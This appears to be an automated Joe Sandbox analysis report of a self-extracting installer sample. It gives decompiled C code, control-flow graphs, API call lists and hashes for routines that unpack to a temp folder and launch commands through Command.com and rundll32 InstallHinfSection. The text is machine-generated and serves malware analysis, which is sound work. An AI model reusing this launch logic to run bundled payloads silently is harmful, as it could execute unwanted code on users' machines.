                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                        • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                        • API String ID: 1032054927-2481547932
                                                                                                                                                                                                        • Opcode ID: e6d0b72c70fb01e3b2282da4bddea3fd9929b5b612b49e0566f5dd8ce7b1c278
                                                                                                                                                                                                        • Instruction ID: fce6dfe08efc8ba554b0cbe7e35705257517e37f13d3cc16250e8bf994506f65
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6d0b72c70fb01e3b2282da4bddea3fd9929b5b612b49e0566f5dd8ce7b1c278
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FCB1F2B06083099BE720EF64D845B7B77E4EF84710F10092EFBA5D6290DB75CA85CB62
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 141 1f1ae8-1f1b2c call 1f1680 144 1f1b2e-1f1b39 141->144 145 1f1b3b-1f1b40 141->145 146 1f1b46-1f1b61 call 1f1a84 144->146 145->146 149 1f1b9f-1f1bc2 call 1f1781 call 1f658a 146->149 150 1f1b63-1f1b65 146->150 157 1f1bc7-1f1bd3 call 1f66c8 149->157 152 1f1b68-1f1b6d 150->152 152->152 154 1f1b6f-1f1b74 152->154 154->149 156 1f1b76-1f1b7b 154->156 158 1f1b7d-1f1b81 156->158 159 1f1b83-1f1b86 156->159 165 1f1bd9-1f1bf1 CompareStringA 157->165 166 1f1d73-1f1d7f call 1f66c8 157->166 158->159 161 1f1b8c-1f1b9d call 1f1680 158->161 159->149 162 1f1b88-1f1b8a 159->162 161->157 162->149 162->161 165->166 168 1f1bf7-1f1c07 GetFileAttributesA 165->168 175 1f1df8-1f1e09 LocalAlloc 166->175 176 1f1d81-1f1d99 CompareStringA 166->176 170 1f1c0d-1f1c15 168->170 171 1f1d53-1f1d5e 168->171 170->171 174 1f1c1b-1f1c33 call 1f1a84 170->174 173 1f1d64-1f1d6e call 1f44b9 171->173 188 1f1e94-1f1ea4 call 1f6ce0 173->188 190 1f1c35-1f1c38 174->190 191 1f1c50-1f1c61 LocalAlloc 174->191 178 1f1e0b-1f1e1b GetFileAttributesA 175->178 179 1f1dd4-1f1ddf 175->179 176->175 181 1f1d9b-1f1da2 176->181 183 1f1e1d-1f1e1f 178->183 184 1f1e67-1f1e73 call 1f1680 178->184 179->173 186 1f1da5-1f1daa 181->186 183->184 189 1f1e21-1f1e3e call 1f1781 183->189 194 1f1e78-1f1e84 call 1f2aac 184->194 186->186 192 1f1dac-1f1db4 186->192 189->194 211 1f1e40-1f1e43 189->211 197 1f1c3a 190->197 198 1f1c40-1f1c4b call 1f1a84 190->198 191->179 193 1f1c67-1f1c72 191->193 199 1f1db7-1f1dbc 192->199 202 1f1c79-1f1cc0 GetPrivateProfileIntA GetPrivateProfileStringA 193->202 203 1f1c74 193->203 210 1f1e89-1f1e92 194->210 197->198 198->191 199->199 201 1f1dbe-1f1dd2 LocalAlloc 199->201 201->179 207 1f1de1-1f1df3 call 1f171e 201->207 208 1f1cf8-1f1d07 202->208 209 1f1cc2-1f1ccc 202->209 203->202 207->210 216 1f1d09-1f1d21 GetShortPathNameA 208->216 217 1f1d23 208->217 213 1f1cce 209->213 214 1f1cd3-1f1cf3 call 1f1680 * 2 209->214 210->188 211->194 215 1f1e45-1f1e65 call 1f16b3 * 2 211->215 213->214 214->210 215->194 221 1f1d28-1f1d2b 216->221 217->221 222 1f1d2d 221->222 223 1f1d32-1f1d4e call 1f171e 221->223 222->223 223->210
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E001F1AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v527;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				char _v1552;
                                                                                                                                                                                                        				CHAR* _v1556;
                                                                                                                                                                                                        				int* _v1560;
                                                                                                                                                                                                        				CHAR** _v1564;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                                        				CHAR* _t53;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				char* _t57;
                                                                                                                                                                                                        				char* _t58;
                                                                                                                                                                                                        				CHAR* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				signed char _t65;
                                                                                                                                                                                                        				intOrPtr _t76;
                                                                                                                                                                                                        				intOrPtr _t77;
                                                                                                                                                                                                        				unsigned int _t85;
                                                                                                                                                                                                        				CHAR* _t90;
                                                                                                                                                                                                        				CHAR* _t92;
                                                                                                                                                                                                        				char _t105;
                                                                                                                                                                                                        				char _t106;
                                                                                                                                                                                                        				CHAR** _t111;
                                                                                                                                                                                                        				CHAR* _t115;
                                                                                                                                                                                                        				intOrPtr* _t125;
                                                                                                                                                                                                        				void* _t126;
                                                                                                                                                                                                        				CHAR* _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				void* _t138;
                                                                                                                                                                                                        				void* _t139;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				intOrPtr* _t146;
                                                                                                                                                                                                        				char* _t148;
                                                                                                                                                                                                        				CHAR* _t151;
                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                        				CHAR* _t155;
                                                                                                                                                                                                        				CHAR* _t156;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				signed int _t158;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t48 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                        				_t108 = __ecx;
                                                                                                                                                                                                        				_v1564 = _a4;
                                                                                                                                                                                                        				_v1560 = _a8;
                                                                                                                                                                                                        				E001F1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                        				if(_v528 != 0x22) {
                                                                                                                                                                                                        					_t135 = " ";
                                                                                                                                                                                                        					_t53 =  &_v528;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t135 = "\"";
                                                                                                                                                                                                        					_t53 =  &_v527;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t111 =  &_v1556;
                                                                                                                                                                                                        				_v1556 = _t53;
                                                                                                                                                                                                        				_t54 = E001F1A84(_t111, _t135);
                                                                                                                                                                                                        				_t156 = _v1556;
                                                                                                                                                                                                        				_t151 = _t54;
                                                                                                                                                                                                        				if(_t156 == 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					_push(_t111);
                                                                                                                                                                                                        					E001F1781( &_v268, 0x104, _t111, "C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        					E001F658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                        					goto L13;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t132 = _t156;
                                                                                                                                                                                                        					_t148 =  &(_t132[1]);
                                                                                                                                                                                                        					do {
                                                                                                                                                                                                        						_t105 =  *_t132;
                                                                                                                                                                                                        						_t132 =  &(_t132[1]);
                                                                                                                                                                                                        					} while (_t105 != 0);
                                                                                                                                                                                                        					_t111 = _t132 - _t148;
                                                                                                                                                                                                        					if(_t111 < 3) {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t106 = _t156[1];
                                                                                                                                                                                                        					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                        						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L11;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						E001F1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t138 = 0x2e;
                                                                                                                                                                                                        						_t57 = E001F66C8(_t156, _t138);
                                                                                                                                                                                                        						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                        							_t139 = 0x2e;
                                                                                                                                                                                                        							_t115 = _t156;
                                                                                                                                                                                                        							_t58 = E001F66C8(_t115, _t139);
                                                                                                                                                                                                        							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									goto L43;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                        								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                        									E001F1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_push(_t115);
                                                                                                                                                                                                        									_t108 = 0x400;
                                                                                                                                                                                                        									E001F1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                        									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                        										E001F16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                        										E001F16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t140 = _t156;
                                                                                                                                                                                                        								 *_t156 = 0;
                                                                                                                                                                                                        								E001F2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                        								goto L53;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t108 = "Command.com /c %s";
                                                                                                                                                                                                        								_t125 = "Command.com /c %s";
                                                                                                                                                                                                        								_t145 = _t125 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t76 =  *_t125;
                                                                                                                                                                                                        									_t125 = _t125 + 1;
                                                                                                                                                                                                        								} while (_t76 != 0);
                                                                                                                                                                                                        								_t126 = _t125 - _t145;
                                                                                                                                                                                                        								_t146 =  &_v268;
                                                                                                                                                                                                        								_t157 = _t146 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t77 =  *_t146;
                                                                                                                                                                                                        									_t146 = _t146 + 1;
                                                                                                                                                                                                        								} while (_t77 != 0);
                                                                                                                                                                                                        								_t140 = _t146 - _t157;
                                                                                                                                                                                                        								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                        								if(_t156 != 0) {
                                                                                                                                                                                                        									E001F171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                        									goto L53;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L43;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t140 = 0x525;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t60 =  &_v268;
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t140 = "[";
                                                                                                                                                                                                        								_v1556 = _t151;
                                                                                                                                                                                                        								_t90 = E001F1A84( &_v1556, "[");
                                                                                                                                                                                                        								if(_t90 != 0) {
                                                                                                                                                                                                        									if( *_t90 != 0) {
                                                                                                                                                                                                        										_v1556 = _t90;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t140 = "]";
                                                                                                                                                                                                        									E001F1A84( &_v1556, "]");
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                        								if(_t156 == 0) {
                                                                                                                                                                                                        									L43:
                                                                                                                                                                                                        									_t60 = 0;
                                                                                                                                                                                                        									_t140 = 0x4b5;
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									_push(0x10);
                                                                                                                                                                                                        									_push(0);
                                                                                                                                                                                                        									L35:
                                                                                                                                                                                                        									_push(_t60);
                                                                                                                                                                                                        									E001F44B9(0, _t140);
                                                                                                                                                                                                        									_t62 = 0;
                                                                                                                                                                                                        									goto L54;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t155 = _v1556;
                                                                                                                                                                                                        									_t92 = _t155;
                                                                                                                                                                                                        									if( *_t155 == 0) {
                                                                                                                                                                                                        										_t92 = "DefaultInstall";
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									 *0x1f9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                        									 *_v1560 = 1;
                                                                                                                                                                                                        									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x1f1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                        										 *0x1f9a34 =  *0x1f9a34 & 0xfffffffb;
                                                                                                                                                                                                        										if( *0x1f9a40 != 0) {
                                                                                                                                                                                                        											_t108 = "setupapi.dll";
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t108 = "setupx.dll";
                                                                                                                                                                                                        											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_push( &_v268);
                                                                                                                                                                                                        										_push(_t155);
                                                                                                                                                                                                        										E001F171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										 *0x1f9a34 =  *0x1f9a34 | 0x00000004;
                                                                                                                                                                                                        										if( *_t155 == 0) {
                                                                                                                                                                                                        											_t155 = "DefaultInstall";
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										E001F1680(_t108, 0x104, _t155);
                                                                                                                                                                                                        										_t140 = 0x200;
                                                                                                                                                                                                        										E001F1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L53:
                                                                                                                                                                                                        									_t62 = 1;
                                                                                                                                                                                                        									 *_v1564 = _t156;
                                                                                                                                                                                                        									L54:
                                                                                                                                                                                                        									_pop(_t152);
                                                                                                                                                                                                        									return E001F6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}














































                                                                                                                                                                                                        0x001f1af3
                                                                                                                                                                                                        0x001f1afa
                                                                                                                                                                                                        0x001f1b07
                                                                                                                                                                                                        0x001f1b09
                                                                                                                                                                                                        0x001f1b1a
                                                                                                                                                                                                        0x001f1b20
                                                                                                                                                                                                        0x001f1b2c
                                                                                                                                                                                                        0x001f1b3b
                                                                                                                                                                                                        0x001f1b40
                                                                                                                                                                                                        0x001f1b2e
                                                                                                                                                                                                        0x001f1b2e
                                                                                                                                                                                                        0x001f1b33
                                                                                                                                                                                                        0x001f1b33
                                                                                                                                                                                                        0x001f1b46
                                                                                                                                                                                                        0x001f1b4c
                                                                                                                                                                                                        0x001f1b52
                                                                                                                                                                                                        0x001f1b57
                                                                                                                                                                                                        0x001f1b5d
                                                                                                                                                                                                        0x001f1b61
                                                                                                                                                                                                        0x001f1b9f
                                                                                                                                                                                                        0x001f1b9f
                                                                                                                                                                                                        0x001f1bb1
                                                                                                                                                                                                        0x001f1bc2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1b63
                                                                                                                                                                                                        0x001f1b63
                                                                                                                                                                                                        0x001f1b65
                                                                                                                                                                                                        0x001f1b68
                                                                                                                                                                                                        0x001f1b68
                                                                                                                                                                                                        0x001f1b6a
                                                                                                                                                                                                        0x001f1b6b
                                                                                                                                                                                                        0x001f1b6f
                                                                                                                                                                                                        0x001f1b74
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1b76
                                                                                                                                                                                                        0x001f1b7b
                                                                                                                                                                                                        0x001f1b86
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1b8c
                                                                                                                                                                                                        0x001f1b8c
                                                                                                                                                                                                        0x001f1b98
                                                                                                                                                                                                        0x001f1bc7
                                                                                                                                                                                                        0x001f1bc9
                                                                                                                                                                                                        0x001f1bcc
                                                                                                                                                                                                        0x001f1bd3
                                                                                                                                                                                                        0x001f1d75
                                                                                                                                                                                                        0x001f1d76
                                                                                                                                                                                                        0x001f1d78
                                                                                                                                                                                                        0x001f1d7f
                                                                                                                                                                                                        0x001f1e05
                                                                                                                                                                                                        0x001f1e09
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1e12
                                                                                                                                                                                                        0x001f1e1b
                                                                                                                                                                                                        0x001f1e73
                                                                                                                                                                                                        0x001f1e21
                                                                                                                                                                                                        0x001f1e21
                                                                                                                                                                                                        0x001f1e28
                                                                                                                                                                                                        0x001f1e37
                                                                                                                                                                                                        0x001f1e3e
                                                                                                                                                                                                        0x001f1e52
                                                                                                                                                                                                        0x001f1e60
                                                                                                                                                                                                        0x001f1e60
                                                                                                                                                                                                        0x001f1e3e
                                                                                                                                                                                                        0x001f1e79
                                                                                                                                                                                                        0x001f1e7b
                                                                                                                                                                                                        0x001f1e84
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1d9b
                                                                                                                                                                                                        0x001f1d9b
                                                                                                                                                                                                        0x001f1da0
                                                                                                                                                                                                        0x001f1da2
                                                                                                                                                                                                        0x001f1da5
                                                                                                                                                                                                        0x001f1da5
                                                                                                                                                                                                        0x001f1da7
                                                                                                                                                                                                        0x001f1da8
                                                                                                                                                                                                        0x001f1dac
                                                                                                                                                                                                        0x001f1dae
                                                                                                                                                                                                        0x001f1db4
                                                                                                                                                                                                        0x001f1db7
                                                                                                                                                                                                        0x001f1db7
                                                                                                                                                                                                        0x001f1db9
                                                                                                                                                                                                        0x001f1dba
                                                                                                                                                                                                        0x001f1dbe
                                                                                                                                                                                                        0x001f1dc3
                                                                                                                                                                                                        0x001f1dce
                                                                                                                                                                                                        0x001f1dd2
                                                                                                                                                                                                        0x001f1deb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1df0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1dd2
                                                                                                                                                                                                        0x001f1bf7
                                                                                                                                                                                                        0x001f1bfe
                                                                                                                                                                                                        0x001f1c07
                                                                                                                                                                                                        0x001f1d55
                                                                                                                                                                                                        0x001f1d5a
                                                                                                                                                                                                        0x001f1d5b
                                                                                                                                                                                                        0x001f1d5d
                                                                                                                                                                                                        0x001f1d5e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1c1b
                                                                                                                                                                                                        0x001f1c1b
                                                                                                                                                                                                        0x001f1c20
                                                                                                                                                                                                        0x001f1c2c
                                                                                                                                                                                                        0x001f1c33
                                                                                                                                                                                                        0x001f1c38
                                                                                                                                                                                                        0x001f1c3a
                                                                                                                                                                                                        0x001f1c3a
                                                                                                                                                                                                        0x001f1c40
                                                                                                                                                                                                        0x001f1c4b
                                                                                                                                                                                                        0x001f1c4b
                                                                                                                                                                                                        0x001f1c5d
                                                                                                                                                                                                        0x001f1c61
                                                                                                                                                                                                        0x001f1dd4
                                                                                                                                                                                                        0x001f1dd4
                                                                                                                                                                                                        0x001f1dd6
                                                                                                                                                                                                        0x001f1ddb
                                                                                                                                                                                                        0x001f1ddc
                                                                                                                                                                                                        0x001f1dde
                                                                                                                                                                                                        0x001f1d64
                                                                                                                                                                                                        0x001f1d64
                                                                                                                                                                                                        0x001f1d67
                                                                                                                                                                                                        0x001f1d6c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f1c67
                                                                                                                                                                                                        0x001f1c67
                                                                                                                                                                                                        0x001f1c6d
                                                                                                                                                                                                        0x001f1c72
                                                                                                                                                                                                        0x001f1c74
                                                                                                                                                                                                        0x001f1c74
                                                                                                                                                                                                        0x001f1c8e
                                                                                                                                                                                                        0x001f1c99
                                                                                                                                                                                                        0x001f1cc0
                                                                                                                                                                                                        0x001f1cf8
                                                                                                                                                                                                        0x001f1d07
                                                                                                                                                                                                        0x001f1d23
                                                                                                                                                                                                        0x001f1d09
                                                                                                                                                                                                        0x001f1d14
                                                                                                                                                                                                        0x001f1d1b
                                                                                                                                                                                                        0x001f1d1b
                                                                                                                                                                                                        0x001f1d2b
                                                                                                                                                                                                        0x001f1d2d
                                                                                                                                                                                                        0x001f1d2d
                                                                                                                                                                                                        0x001f1d38
                                                                                                                                                                                                        0x001f1d39
                                                                                                                                                                                                        0x001f1d46
                                                                                                                                                                                                        0x001f1cc2
                                                                                                                                                                                                        0x001f1cc2
                                                                                                                                                                                                        0x001f1ccc
                                                                                                                                                                                                        0x001f1cce
                                                                                                                                                                                                        0x001f1cce
                                                                                                                                                                                                        0x001f1cdb
                                                                                                                                                                                                        0x001f1ce6
                                                                                                                                                                                                        0x001f1cee
                                                                                                                                                                                                        0x001f1cee
                                                                                                                                                                                                        0x001f1e89
                                                                                                                                                                                                        0x001f1e91
                                                                                                                                                                                                        0x001f1e92
                                                                                                                                                                                                        0x001f1e94
                                                                                                                                                                                                        0x001f1e97
                                                                                                                                                                                                        0x001f1ea4
                                                                                                                                                                                                        0x001f1ea4
                                                                                                                                                                                                        0x001f1c61
                                                                                                                                                                                                        0x001f1c07
                                                                                                                                                                                                        0x001f1bd3
                                                                                                                                                                                                        0x001f1b7b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 001F1BE7
                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 001F1BFE
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,?,00000000,00000001,00000000), ref: 001F1C57
                                                                                                                                                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 001F1C88
                                                                                                                                                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,001F1140,00000000,00000008,?), ref: 001F1CB8
                                                                                                                                                                                                        • GetShortPathNameA.KERNEL32 ref: 001F1D1B
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                        • API String ID: 383838535-852641736
                                                                                                                                                                                                        • Opcode ID: 2f3dc5e4f77ba5f77735fe6b66f7c199b4c93924c7ad69c20fbd8cf206bbcf1d
                                                                                                                                                                                                        • Instruction ID: 56ba039dcf8e1a49aff38209634004c29998a884eb7566470b6fb685943be930
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f3dc5e4f77ba5f77735fe6b66f7c199b4c93924c7ad69c20fbd8cf206bbcf1d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60A1F6B0A0421CFBEB20DB24CC45BFA77799B91320F144295EB55E32D1DBB59D85CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 450 1f2f1d-1f2f3d 451 1f2f3f-1f2f46 450->451 452 1f2f6c-1f2f73 call 1f5164 450->452 454 1f2f5f-1f2f66 call 1f3a3f 451->454 455 1f2f48 call 1f51e5 451->455 460 1f2f79-1f2f80 call 1f55a0 452->460 461 1f3041 452->461 454->452 454->461 462 1f2f4d-1f2f4f 455->462 460->461 468 1f2f86-1f2fbe GetSystemDirectoryA call 1f658a LoadLibraryA 460->468 464 1f3043-1f3053 call 1f6ce0 461->464 462->461 465 1f2f55-1f2f5d 462->465 465->452 465->454 472 1f2ff7-1f3004 FreeLibrary 468->472 473 1f2fc0-1f2fd4 GetProcAddress 468->473 474 1f3017-1f3024 SetCurrentDirectoryA 472->474 475 1f3006-1f300c 472->475 473->472 476 1f2fd6-1f2fee DecryptFileA 473->476 478 1f3026-1f303c call 1f44b9 call 1f6285 474->478 479 1f3054-1f305a 474->479 475->474 477 1f300e call 1f621e 475->477 476->472 485 1f2ff0-1f2ff5 476->485 489 1f3013-1f3015 477->489 478->461 480 1f305c call 1f3b26 479->480 481 1f3065-1f306c 479->481 491 1f3061-1f3063 480->491 487 1f306e-1f3075 call 1f256d 481->487 488 1f307c-1f3089 481->488 485->472 496 1f307a 487->496 493 1f308b-1f3091 488->493 494 1f30a1-1f30a9 488->494 489->461 489->474 491->461 491->481 493->494 497 1f3093 call 1f3ba2 493->497 499 1f30ab-1f30ad 494->499 500 1f30b4-1f30b7 494->500 496->488 504 1f3098-1f309a 497->504 499->500 501 1f30af call 1f4169 499->501 500->464 501->500 504->461 505 1f309c 504->505 505->494
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E001F2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v272;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        				intOrPtr* _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        				void* _t30;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        				int _t47;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t59;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t43 = __edx;
                                                                                                                                                                                                        				_t9 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                        				if( *0x1f8a38 != 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					_t11 = E001F5164(_t52);
                                                                                                                                                                                                        					_t53 = _t11;
                                                                                                                                                                                                        					if(_t11 == 0) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                                                        						L17:
